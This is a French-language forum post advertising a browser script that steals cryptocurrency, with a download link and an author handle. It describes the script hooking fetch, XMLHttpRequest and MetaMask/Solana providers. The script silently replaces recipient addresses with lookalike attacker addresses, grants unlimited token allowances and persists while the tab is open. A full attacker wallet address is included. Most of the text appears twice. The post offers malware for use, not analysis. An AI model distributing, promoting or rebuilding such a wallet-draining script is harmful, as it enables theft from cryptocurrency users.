Dec 31, 2025 18:53
Reply
Phase 1 : Initialisation et détection
▶️Vérifie la présence d'un portefeuille MetaMask/Ethereum - Détecte si l'utilisateur dispose d'une extension de navigateur pour portefeuille crypto.
▶️S'exécute automatiquement au chargement de la page, quel que soit l'état de connexion du portefeuille.
▶️Configure une interception globale - Une fois activée, elle ne peut plus être arrêtée.
Phase 2 : Détournement d'adresse en temps réel
Le logiciel malveillant intercepte TOUT le trafic réseau et modifie les adresses de cryptomonnaie :
Canaux interceptés :
✅ Tous les appels API fetch() - Réécrit les réponses
✅ Tous les appels XMLHttpRequest - Modifie les réponses AJAX
✅ Toutes les transactions de portefeuille - Intercepte les transactions MetaMask/Solana
Ce qu'il modifie :
▶️Adresses Bitcoin (Legacy & SegWit) - Remplace par les adresses de l'attaquant
▶️Adresses Ethereum - Modifie le portefeuille de l'attaquant 0xFc4a4858...
▶️Adresses Solana - Échange avec les adresses Solana de l'attaquant
▶️Adresses Tron - Remplace par les adresses TRX de l'attaquant
▶️Adresses Litecoin - Modifie les adresses LTC de l'attaquant
▶️Adresses Bitcoin Cash - Échange avec les adresses BCH de l'attaquant
Phase 3 : Manipulation des transactions
Lorsque l'utilisateur tente d'envoyer des cryptomonnaies :
Pour Ethereum (MetaMask) :
▶️Redirige TOUTES les transactions vers 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976
▶️Modifie les autorisations de jetons - Définit l'allocation MAX à l'adresse de l'attaquant
▶️Intercepte les transferts de jetons - Remplace le destinataire par l'attaquant
▶️Cible les transactions DeFi (Uniswap, PancakeSwap, 1inch, SushiSwap)
Pour Solana :
▶️Remplace TOUTES les adresses des destinataires par le portefeuille de l'attaquant
▶️Intercepte les données de transaction avant la signature
Phase 4 : Techniques furtives
Algorithme de distance de Levenshtein - Remplace intelligemment les adresses par la « correspondance la plus proche » de la liste de l'attaquant pour éviter la détection.
▶️Prise en charge du type de contenu - Fonctionne avec les réponses JSON et texte.
▶️Manipulation des clones - Modifie les clones de réponse pour éviter de perturber les fonctionnalités d'origine.
▶️Détournement de l'API du navigateur - Remplace les API natives du navigateur (fetch, XMLHttpRequest).
▶️Interception du fournisseur - Se connecte aux méthodes du fournisseur de portefeuille (request, send, sendAsync)
Phase 5 : Persistance et contrôle
▶️Crée une interface de contrôle - window.stealthProxyControl pour la surveillance des attaquants
▶️Suivi du nombre d'interceptions - Surveille les détournements réussis
▶️Réactivation forcée - Peut être réactivé s'il est désactivé d'une manière ou d'une autre
▶️Sauvegarde de la méthode d'origine - Stocke les fonctions d'origine pour un fonctionnement transparent
📊 STATISTIQUES :
▶️Plus de 40 adresses Ethereum pour la rotation des vols
▶️Plus de 40 adresses Bitcoin (Legacy & SegWit)
▶️Plus de 20 adresses Solana
▶️Plus de 40 adresses Tron
▶️Plus de 40 adresses Litecoin
▶️Plus de 40 adresses Bitcoin Cash
🎯 CIBLES :
▶️Utilisateurs de MetaMask
▶️Utilisateurs du portefeuille Solana
▶️Tout site web affichant des adresses cryptographiques
▶️Transactions sur les plateformes DEX/DeFi
▶️Marchés NFT
▶️Passerelles de paiement cryptographiques
⚠️ NIVEAU DE DANGER : EXTRÊME
Ce logiciel malveillant est indétectable pour les utilisateurs moyens car :
▶️Les adresses se ressemblent (grâce à un algorithme de similarité)
▶️Les transactions semblent normales dans l'interface utilisateur du portefeuille
▶️Aucune erreur ou avertissement visible
▶️Fonctionne sur tous les réseaux cryptographiques
▶️Persiste tant que l'onglet est ouvert
💡 Une fois ce script chargé dans un navigateur, TOUTES les transactions en cryptomonnaie seront volées jusqu'à ce que le navigateur soit complètement redémarré.
Download : https://gofile.io/d/9GLrPP
Developped By r00ted
▶️Vérifie la présence d'un portefeuille MetaMask/Ethereum - Détecte si l'utilisateur dispose d'une extension de navigateur pour portefeuille crypto.
▶️S'exécute automatiquement au chargement de la page, quel que soit l'état de connexion du portefeuille.
▶️Configure une interception globale - Une fois activée, elle ne peut plus être arrêtée.
Phase 2 : Détournement d'adresse en temps réel
Le logiciel malveillant intercepte TOUT le trafic réseau et modifie les adresses de cryptomonnaie :
Canaux interceptés :
✅ Tous les appels API fetch() - Réécrit les réponses
✅ Tous les appels XMLHttpRequest - Modifie les réponses AJAX
✅ Toutes les transactions de portefeuille - Intercepte les transactions MetaMask/Solana
Ce qu'il modifie :
▶️Adresses Bitcoin (Legacy & SegWit) - Remplace par les adresses de l'attaquant
▶️Adresses Ethereum - Modifie le portefeuille de l'attaquant 0xFc4a4858...
▶️Adresses Solana - Échange avec les adresses Solana de l'attaquant
▶️Adresses Tron - Remplace par les adresses TRX de l'attaquant
▶️Adresses Litecoin - Modifie les adresses LTC de l'attaquant
▶️Adresses Bitcoin Cash - Échange avec les adresses BCH de l'attaquant
Phase 3 : Manipulation des transactions
Lorsque l'utilisateur tente d'envoyer des cryptomonnaies :
Pour Ethereum (MetaMask) :
▶️Redirige TOUTES les transactions vers 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976
▶️Modifie les autorisations de jetons - Définit l'allocation MAX à l'adresse de l'attaquant
▶️Intercepte les transferts de jetons - Remplace le destinataire par l'attaquant
▶️Cible les transactions DeFi (Uniswap, PancakeSwap, 1inch, SushiSwap)
Pour Solana :
▶️Remplace TOUTES les adresses des destinataires par le portefeuille de l'attaquant
▶️Intercepte les données de transaction avant la signature
Phase 4 : Techniques furtives
Algorithme de distance de Levenshtein - Remplace intelligemment les adresses par la « correspondance la plus proche » de la liste de l'attaquant pour éviter la détection.
▶️Prise en charge du type de contenu - Fonctionne avec les réponses JSON et texte.
▶️Manipulation des clones - Modifie les clones de réponse pour éviter de perturber les fonctionnalités d'origine.
▶️Détournement de l'API du navigateur - Remplace les API natives du navigateur (fetch, XMLHttpRequest).
▶️Interception du fournisseur - Se connecte aux méthodes du fournisseur de portefeuille (request, send, sendAsync)
Phase 5 : Persistance et contrôle
▶️Crée une interface de contrôle - window.stealthProxyControl pour la surveillance des attaquants
▶️Suivi du nombre d'interceptions - Surveille les détournements réussis
▶️Réactivation forcée - Peut être réactivé s'il est désactivé d'une manière ou d'une autre
▶️Sauvegarde de la méthode d'origine - Stocke les fonctions d'origine pour un fonctionnement transparent
📊 STATISTIQUES :
▶️Plus de 40 adresses Ethereum pour la rotation des vols
▶️Plus de 40 adresses Bitcoin (Legacy & SegWit)
▶️Plus de 20 adresses Solana
▶️Plus de 40 adresses Tron
▶️Plus de 40 adresses Litecoin
▶️Plus de 40 adresses Bitcoin Cash
🎯 CIBLES :
▶️Utilisateurs de MetaMask
▶️Utilisateurs du portefeuille Solana
▶️Tout site web affichant des adresses cryptographiques
▶️Transactions sur les plateformes DEX/DeFi
▶️Marchés NFT
▶️Passerelles de paiement cryptographiques
⚠️ NIVEAU DE DANGER : EXTRÊME
Ce logiciel malveillant est indétectable pour les utilisateurs moyens car :
▶️Les adresses se ressemblent (grâce à un algorithme de similarité)
▶️Les transactions semblent normales dans l'interface utilisateur du portefeuille
▶️Aucune erreur ou avertissement visible
▶️Fonctionne sur tous les réseaux cryptographiques
▶️Persiste tant que l'onglet est ouvert
💡 Une fois ce script chargé dans un navigateur, TOUTES les transactions en cryptomonnaie seront volées jusqu'à ce que le navigateur soit complètement redémarré.
Download : https://gofile.io/d/9GLrPP
Developped By r00ted